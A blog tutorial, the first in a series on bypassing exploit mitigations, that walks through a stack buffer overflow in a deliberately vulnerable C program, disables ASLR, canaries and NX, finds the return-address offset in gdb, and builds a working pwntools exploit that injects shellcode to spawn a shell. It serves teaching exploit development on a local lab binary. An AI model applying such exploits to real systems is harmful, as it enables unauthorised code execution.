How to Bypass Basic Exploit Mitigation - Part 0x00 - Vanilla Buffer Overflow

Table of Contents

Hoursekeeping

Buffer Overflow - Basic Concept

Vanilla Stack Buffer Overflow: Example

Deep Dive into the Stack Buffer Overflow

Exploit Development

Conclusions (preventing buffer overflow)

Housekeeping

This blog post series focuses on different basic exploitation mitigation techniques and how to bypass them in the exploitation process. It consists of:

  • Part 0 - Vanilla Buffer Overflow
  • Part 1 - Stack Canaries
  • Part 2 - DEP
  • Part 3 - ASLR

This is part 0 of the series that discusses vanilla buffer overflow.

Prerequisites

To fully understand the content of this series, you should have a basic knowledge of the following:

Tools

Throughout this series, we will be using (and you will need to follow along) the following basic tools:

Buffer Overflow - Basic Concept

Let's kick off by briefly describing what a buffer overflow is. A buffer overflow in software occurs when a program writes more data to a buffer (a temporary area of memory) than the buffer is designed to hold, causing the extra data to overwrite adjacent memory regions. This can corrupt program data, crash the application, or even allow for the manipulation of the program's execution and the injection of malicious code.

How Buffer Overflows Happen

Buffers are used extensively in software to store data, often during I/O operations or when processing user input. Suppose a program accepts input without checking its size, and the input is larger than the buffer’s capacity. In that case, the excess data will spill into neighboring memory locations, potentially altering critical program structures or code.

Programming Languages

Languages like C and C++ are especially vulnerable to buffer overflow issues because they do not automatically check array boundaries or protect against out-of-bounds memory writes. Functions such as strcpy or gets in C are notorious for enabling buffer overflows if not used carefully.

Vanilla Stack Buffer Overflow: Example

Let's consider the following C code. It is the most basic example of a program that is vulnerable to a buffer overflow:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vuln() {
    char name[32];
    printf("\nWhat is your name?\n");
    read(0, name, 256); # here we are overflowing the `name` buffer
}

int main() {
    vuln();
    return 0;
}

On line 6, we declare a variable name that is an array of char type, and can hold up to 32 elements. On line 8, we have a call to read function from the libc library, where as the first argument we pass the file descriptor (0 being the stdin, so we use the standard input). Next, we provide our name variable (technically, name is a pointer to a 32-byte buffer, i.e., a 32-element array of type char). Last but not least, we pass on the number that represents how many bytes will be read from the file descriptor, i.e., how many bytes (or characters) will be taken from our input and placed in the name buffer.

The issue in this program is that the name buffer is allocated on the stack with a size of 32 bytes, while we attempt to store up to 256 bytes of arbitrary data in it. This, of course, leads to an overflow (as we write the data past the boundary of the name buffer). It is a classic stack buffer overflow example.

Let's try to visualize what's happening:


      before read() call                  name = "andy1337"                   name = A * 64

------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |          andy1337          |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|          RBP value         |     |          RBP value         |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|     ret addr to main()     |     |     ret addr to main()     |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------

The first column represents the stack layout before we call the read() function. The next column shows what the stack looks like when we provide an input that does not overflow the name buffer. The last column shows what will happen if we give an input of 64 letters "A". In the last case, we will overwrite the RBP value and the return address of the main() function with our arbitrary data.

We will now take a deep dive into what exactly happens and how this behavior can be exploited.

Deep Dive into the Stack Buffer Overflow

First, let's compile our vulnerable program:

gcc -o vuln vuln.c

Output:

vuln.c: In function ‘vuln’:
vuln.c:8:5: warning: ‘read’ writing 256 bytes into a region of size 32 overflows the destination [-Wstringop-overflow=]
    8 |     read(0, name, 256);
      |     ^~~~~~~~~~~~~~~~~~
vuln.c:6:10: note: destination object ‘name’ of size 32
    6 |     char name[32];
      |          ^~~~
In file included from vuln.c:3:
/usr/include/unistd.h:371:16: note: in a call to function ‘read’ declared with attribute ‘access (write_only, 2, 3)’
  371 | extern ssize_t read (int __fd, void *__buf, size_t __nbytes) __wur
      |  

We will see a couple of warnings highlighting the exact issue we're trying to demonstrate (the compilers are so smart these days), which we will, of course, ignore.

That's how you usually would compile a C program. Although the program crashes, it's 2025, and several protections are in place by default. Since later in this post, we will be writing a simple exploit for this vulnerability, we don't want to deal with those protections just yet, so we will disable them.

First, let's disable the Address Space Layout Randomization (ASLR) at the kernel lever:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

You can later enable it back:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Second, let's compile our program with all protections disabled. To do that, let's check what those protections are (you can do it with the checksec tool, which you should be able to install with a package manager, such as apt, or with Python pwntools):

pwn checksec ./vuln

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

Here's how to compile it with all protections disabled:

gcc -no-pie -fno-stack-protector -z execstack vuln.c -o vuln

Output:

vuln.c: In function ‘vuln’:
vuln.c:8:5: warning: ‘read’ writing 256 bytes into a region of size 32 overflows the destination [-Wstringop-overflow=]
    8 |     read(0, name, 256);
      |     ^~~~~~~~~~~~~~~~~~
vuln.c:6:10: note: destination object ‘name’ of size 32
    6 |     char name[32];
      |          ^~~~
In file included from vuln.c:3:
/usr/include/unistd.h:371:16: note: in a call to function ‘read’ declared with attribute ‘access (write_only, 2, 3)’
  371 | extern ssize_t read (int __fd, void *__buf, size_t __nbytes) __wur
      |                ^~~~

This will return the same warnings as before, but since we know what we're doing, let's ignore them. -no-pie disables the ASLR for the binary, -fno-stack-protector tells gcc compiler to disable the stack protection (such as stack canaries, which we will discuss in a later post in detail), and -z execstack makes our stack executable (we will need this so that the CPU executes our payload directly from the stack).

If we check our binary now, we should see that all protection is disabled:

pwn checksec ./vuln

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

Note that gcc 14.2.0 has stack canaries disabled by default, but depending on when you try it out, this might not be true (so it's better to pass the -fno-stack-protector option anyway).

Let's now try to run it and provide some input:

./vuln

Output:


What is your name?
andy

We're asked to provide the input, which we do, and the program exits successfully.

Now, the name variable is a 32-element array, but we know that we can provide up to 256 characters in our input (since that's what we passed to the read() function), so let's provide an input that is a little bit larger:

./vuln             

Output:

What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./vuln

You can see that, if we provide the input that is larger than the length of the name array, the program will crash and we will get a segmentation fault error, which indicates that the process is trying to access an area of memory that is not allowed to access. So what exactly happened here?

Debugging

To better understand what is happening, let's run our program in a debugger (note that, in this example, and for simplicity, I don't use any gdb extensions). We know that our program will ask for some input, and since our name buffer is 32 bytes long, let's generate something significantly bigger.

To do that, we will use a cyclic pattern of length 80 (the length is determined by trial and error, but I usually start with roughly twice the original length):

pwn cyclic 80

Output:

aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa

This command will generate a string composed of several 8-byte chunks such that no two chunks in that string are the same. This way, when we hit a segmentation fault, and inspect the values of the registers and stack layout, we will know precisely how large the overflow is, where it lands exactly on the stack, which junk overrides the instruction pointer (the value of the RIP register in x86-84), and how much space we have for our arbitrary code we want to execute.

Let's now run our program in gdb:

gdb ./vuln

Output

GNU gdb (Debian 16.3-1) 16.3
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb)

First, let's enable the Intel syntax, so that the assembly we look at is not too hurtful to our eyes. We do that with set disassembly-flavor intel:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel

Now, run our program with r:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel
(gdb) r

The program will run, and ask us for a name:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel
(gdb) r
Starting program: /home/kali/bof/vanilla/vuln 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

What is your name?

This is where we supply the cyclic pattern we generated before with pwntools:

---snip---
Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
(gdb) set disassembly-flavor intel
(gdb) r
Starting program: /home/kali/bof/vanilla/vuln 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

What is your name?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa

After we enter this string and hit enter, the program will continue and eventually crash:

---snip---
Starting program: /home/kali/bof/vanilla/vuln 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

What is your name?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401165 in vuln ()

The debugger reports that the program received a SIGSEGV, which is a segmentation fault, and our program crashed in the function vuln (). Now, to understand what happened, let's analyze the crash.

First, let's check exactly where we crashed. We can do that either by examining the RIP register, like so: x/i $rip, or we can disassemble the code we're currently at, by typing disass:

---snip---

What is your name?
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaa

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401165 in vuln ()
(gdb) disass
Dump of assembler code for function vuln:
   0x0000000000401136 <+0>:     push   rbp
   0x0000000000401137 <+1>:     mov    rbp,rsp
   0x000000000040113a <+4>:     sub    rsp,0x20
   0x000000000040113e <+8>:     lea    rax,[rip+0xebf]        # 0x402004
   0x0000000000401145 <+15>:    mov    rdi,rax
   0x0000000000401148 <+18>:    call   0x401030 <puts@plt>
   0x000000000040114d <+23>:    lea    rax,[rbp-0x20]
   0x0000000000401151 <+27>:    mov    edx,0x100
   0x0000000000401156 <+32>:    mov    rsi,rax
   0x0000000000401159 <+35>:    mov    edi,0x0
   0x000000000040115e <+40>:    call   0x401040 <read@plt>
   0x0000000000401163 <+45>:    nop
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret

As you can see, the gdb tells us that we're currently at ret instruction, which is at the address 0x0000000000401165, i.e, the offset vuln() + 47. We should note this address, as we will be setting up a breakpoint at this location several times during the exploitation process.

What's also essential at this point is that, although we've overwritten the return address of the main() function on the stack, when you examine the registers by typing info reg in gdb, the RIP register is in fact not overwritten with our payload:

---snip---
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret
End of assembler dump.
(gdb) info reg
rax            0x51                81
rbx            0x7fffffffdd48      140737488346440
rcx            0x8c032900000000    39409971368034304
rdx            0x51                81
rsi            0x7fffffffdc00      140737488346112
rdi            0x0                 0
rbp            0x6161616a61616169  0x6161616a61616169
rsp            0x7fffffffdc28      0x7fffffffdc28
---snip---
rip            0x401165            0x401165 <vuln+47>
---snip---

RIP value is set to 0x101165, which, as you can see in the previous snippet, is the address of the ret instruction. This seems to suggest that we crashed before we actually executed the ret instruction. This is one of the nuanced differences between 32-bit and 64-bit architecture.

To fully understand what's happening, let's first understand what ret actually does: it pops the address of the next instruction from the stack (which we have overwritten), places it in the RIP register, and then the CPU executes the instruction at that address. In a 32-bit architecture, ret will pop the address of the next instruction from the stack and try to execute it. In a 64-bit architecture, when ret is executed, the address to be popped from the stack is first checked to see whether it is a valid address. Because our payload consists of "A" characters, it is not a valid address. As a result, since we're on a 64-bit architecture, the RIP never gets overwritten.

Continuing the analysis of our crash, we should next inspect our stack to determine the value on top. We need this information to determine what would be loaded to the RIP register if it were a valid memory address, and also to identify where in our payload this value is located.

So, let's examine the layout of our stack:

---snip---
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret
End of assembler dump.
(gdb) info reg
rax            0x51                81
---snip---
rsp            0x7fffffffdc28      0x7fffffffdc28
---snip---
rip            0x401165            0x401165 <vuln+47>
---snip---
(gdb) x/5gx $rsp
0x7fffffffdc28: 0x6161616c6161616b      0x6161616e6161616d
0x7fffffffdc38: 0x616161706161616f      0x6161617261616171
0x7fffffffdc48: 0x6161617461616173
(gdb)

We can see that the stack was overflown with our payload, and to determine where in the payload we start overwriting the return address of the main() function, we use the cyclic pattern again, passing on the value from the top of the stack (which in our case is 0x6161616c6161616b):

pwn cyclic -l 0x6161616c6161616b

Output:

40

As you can see, we will start overwriting the return address of the main() function at offset 40 in our payload. This is where we need to place the address of the instruction we want the CPU to execute next.

At this point, we have all (or most) of the information we need to start developing an exploit for this vulnerability. We will do that next.

Exploit Development

Before we start developing the exploit, let's think about what we want it to do. Normally, this is one of the last things you think of, because what you can do is more often than not driven by the nature of, and the environment where your bug lives. In our case, it is pretty simple because we don't have any memory protections in place and can supply the program with a relatively large payload. With that in mind, let's say we want to spawn a shell to take control of the system running the program.

Let's discuss our plan for exploit development. Ideally, we want to hijack the flow control of the program and redirect it to an arbitrary code we supply, so that the CPU executes it. This arbitrary code is called shellcode.

Here's what we know so far, which is important for the exploit development:

  • The application crashes with the segmentation fault if we supply it with a long enough string of data.
  • Starting with byte 40, we will overwrite the return address.
  • Byte 40 is where we need to store the address of the assembly instruction we want the CPU to execute after calling ret.
  • The shellcode we want the CPU to execute has to be provided with our payload, and live somewhere on the stack.

Here's what we don't know:

  • Which instruction do we want to execute?
  • Where is that instruction in the program?
  • How does this one instruction redirect the flow control to the shellcode?

Addressing our unknowns will help us refine the plan for our exploit. There are different techniques to redirect flow control to our shellcode. One often described technique in many resources is to find and use the address of a jmp rsp instruction. This would allow us to proceed as follows:

  • At the moment of the crash, the address of jmp rsp (which we supply in our payload) is popped from the stack to the stored RIP register.
  • jmp rsp instruction is executed by the CPU, which will redirect the flow control back to the stack (whatever RSP register points at).
  • The CPU will try to execute the next thing that is on the stack, but note that this time, it won't treat this data as an address, but the actual instructions instead.

The above means that, if we create our payload in a way that, after byte 40, we supply the address of jmp rsp, and then our shellcode, the CPU will pop the jmp rsp first, leaving our shellcode on top of the stack, and jmp rsp will redirect the flow control to the stack itself, where we have our shellcode ready to be executed.

Unfortunately, our program is small and there won't be any jmp esp instruction. There are other instructions we could try, but they fall more into the Return-Oriented Programming (ROP), which we will discuss in detail in the next post.

For now, however, let's follow the naive approach and take advantage of the fact that the ASLR is disabled and that the address of the stack and our shellcode is almost always the same (we will discuss some exceptions later). This approach will let us use the static address of the stack after ret is executed, which will point directly to our shellcode. We find this address with gdb.

If you recall one of the previous snippets (where we were looking for the offset of our payload at which we should place the address of the next instruction for the CPU to execute at the crash time), the address of that memory location points to the beginning of the stack. In our case, as you can see in the snippet below, when we examine the RSP register, the beginning of the stack is at the address 0x7fffffffdc28:

---snip---
   0x0000000000401164 <+46>:    leave
=> 0x0000000000401165 <+47>:    ret
End of assembler dump.
(gdb) info reg
rax            0x51                81
---snip---
rsp            0x7fffffffdc28      0x7fffffffdc28
---snip---
rip            0x401165            0x401165 <vuln+47>
---snip---
(gdb) x/5gx $rsp
0x7fffffffdc28: 0x6161616c6161616b      0x6161616e6161616d
0x7fffffffdc38: 0x616161706161616f      0x6161617261616171
0x7fffffffdc48: 0x6161617461616173
(gdb)

What we want is to take this address and place it directly after our payload that crashes the application (i.e., after the 40th byte). However, if you recall what the ret instruction does, this address will be popped from the stack, and the CPU will execute the instruction that is at this address, which means that the stack address and its top value will change again. So, what we should do instead is to use the next address, which is 0x7fffffffdc30 (note: this address might be different on your system).

With that in mind, here's how our payload will look initially:

payload = b"A" * 40
payload += p64(0x7fffffffdc30)
payload += shellcode  

First, our payload will include a buffer of length 40, at which we start overwriting the return address of the main() function. Then, we add the address of our shellcode, which will be on the top of the stack, before ret is executed. Last but not least, we add our shellcode, which will become the top of the stack after ret is called.

Once the ret is called, the address 0x7fffffffdc30 will be popped from the stack, placed in the RIP register, and the CPU will execute the instruction that is at this address. At that point, what will be at this address? That's right: our shellcode!

Let's visualize how the stack will look after we overflow the name buffer with our payload:


      before read() call                  name = "andy1337"           name = A * 40 + RSP + shellcode

------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |          andy1337          |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|        `name` buffer       |     |        `name` buffer       |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|          RBP value         |     |          RBP value         |     |          AAAAAAAA          |
------------------------------     ------------------------------     ------------------------------
|     ret addr to main()     |     |     ret addr to main()     |     |       0x7fffffffdc30       |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |         shellcode          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |         shellcode          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |            ...             |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |         shellcode          |
------------------------------     ------------------------------     ------------------------------

Equipped in our initial payload, let's build the exploit. I will use pwntools to aid the process of dealing with the binary and shellcode generation, etc. Here's the code:

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF('./vuln')
p = process('./vuln')

payload  = b"A" * 40
payload += p64(0x7fffffffdc30)
payload += asm(shellcraft.sh())

p.sendlineafter("your name?", payload)
log.info(p.recvline())
p.interactive()

What you see here is that first, we start the process, which is our vuln program. Then, we create our payload, consisting of a 40-byte dummy payload, the address of the shellcode, and the shellcode itself. In our case, this will be just /bin/sh, allowing us to get a shell back. Lastly, we send our payload to the standard input when the program asks for our name, and then we enter interactive mode to interact with the binary.

Let's run it:

./solve.py

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process './vuln': pid 354685
/usr/lib/python3/dist-packages/pwnlib/tubes/tube.py:876: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
/usr/lib/python3/dist-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] 
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ id
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 354685)
[*] Got EOF while sending in interactive

When the exploit runs, it switches to interactive mode, so in theory, that is the new shell we should be able to interact with. But it looks like it didn't work as we hoped, and when we execute the id command, the process exits with another segmentation fault.

Luckily for us, pwntools allows us to attach to, or run the program with gdb. Here's how we start the process with gdb from Python:

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF('./vuln')
p = gdb.debug('./vuln')

payload  = b"A" * 40
payload += p64(0x7fffffffdc30)
payload += asm(shellcraft.sh())

p.sendlineafter("your name?", payload)
log.info(p.recvline())
p.interactive()

So let's investigate what the issue is:

./solve.py

Output:

Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
0x00007ffff7fe3440 in _start () from target:/lib64/ld-linux-x86-64.so.2
(gdb) b *vuln+47
Breakpoint 1 at 0x401165
(gdb) c
Continuing.
Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target...

Breakpoint 1, 0x0000000000401165 in vuln ()
(gdb) x/6gx $rsp
0x7fffffffdc68: 0x00007fffffffdc30      0x6e69622fb848686a
0x7fffffffdc78: 0xe7894850732f2f2f      0x2434810101697268
0x7fffffffdc88: 0x6a56f63101010101      0x894856e601485e08
(gdb) 

First, notice that the pwntools started the gdb automatically. Do you remember when I asked you to make a note of the address at which the program crashed (vuln() + 47)? To avoid stepping through the instruction one by one, we just set a breakpoint at that address (which is the last ret instruction):

(gdb) b*vuln+47

Then we continue with c.

Once we hit the breakpoint, we inspect the RSP register:

Breakpoint 1, 0x0000000000401165 in vuln ()
(gdb) x/6gx $rsp
0x7fffffffdc68: 0x00007fffffffdc30      0x6e69622fb848686a
0x7fffffffdc78: 0xe7894850732f2f2f      0x2434810101697268
0x7fffffffdc88: 0x6a56f63101010101      0x894856e601485e08

What we see here is that the address of RSP is not 0x7fffffffdc28 as we initially investigated, but rather 0x7fffffffdc68. So, let's update our exploit accordingly (remember that it is top of the stack + 8 bytes, since the first value will be popped with ret instruction, so the address we want to use is 0x7fffffffdc70, and not 0x7fffffffdc68).

Here's the final updated exploit:

#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF('./vuln')
p = process('./vuln')

payload  = b"A" * 40
payload += p64(0x7fffffffdc70)
payload += asm(shellcraft.sh())

p.sendlineafter("your name?", payload)
log.info(p.recvline())
p.interactive()

Let's now re-run our exploit:

./solve.py

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process './vuln': pid 362535
/usr/lib/python3/dist-packages/pwnlib/tubes/tube.py:876: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
/usr/lib/python3/dist-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] 
[*] Switching to interactive mode
$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer),138(docker)
$  

Voila! We have a shell back.

At this point, you (hopefully) wonder, if we disabled the ASLR and our program was compiled without PIE, why did we have to change the addresses? The difference in address spaces when running our non-PIE C binary with ASLR disabled under gdb versus launching it directly with pwntools (or the shell) is primarily due to environment handling and gdb’s own process setup. gdb can adjust or inject extra environment variables, command-line arguments, or behaviors that change the stack and memory layout compared to direct execution, even when ASLR is off and the binary is non-PIE.

Just as a side note, by default, gdb explicitly disables ASLR for its debugging sessions and, as a result, you see fixed, predictable addresses in gdb, but outside gdb (even with ASLR disabled system-wide), there can still be slight differences due to environment or loader invocation details.

Conclusions (preventing buffer overflow)

Congrats on sticking until the end and going through all that content. I hope it was informative and it dispelled any doubts you might have on this subject.

Now that you know what a buffer overflow is, you know exactly how it works, have analyzed an example of a stack buffer overflow in a program above, and even wrote your own exploit for it, let's think about how such vulnerabilities can be avoided and what protection mechanisms are at our disposal. Techniques like bounds checking, secure coding practices, and the use of modern languages or compiler features help reduce buffer overflow risks. Operating systems may use defenses like stack canaries, memory layout randomization (ASLR), or non-executable memory regions (DEP) to mitigate exploitation attempts. However, in this blog series, we will explore how to bypass the mentioned mitigation mechanisms to gain code execution on an application vulnerable to a buffer overflow. We will start with DEP, so stay tuned.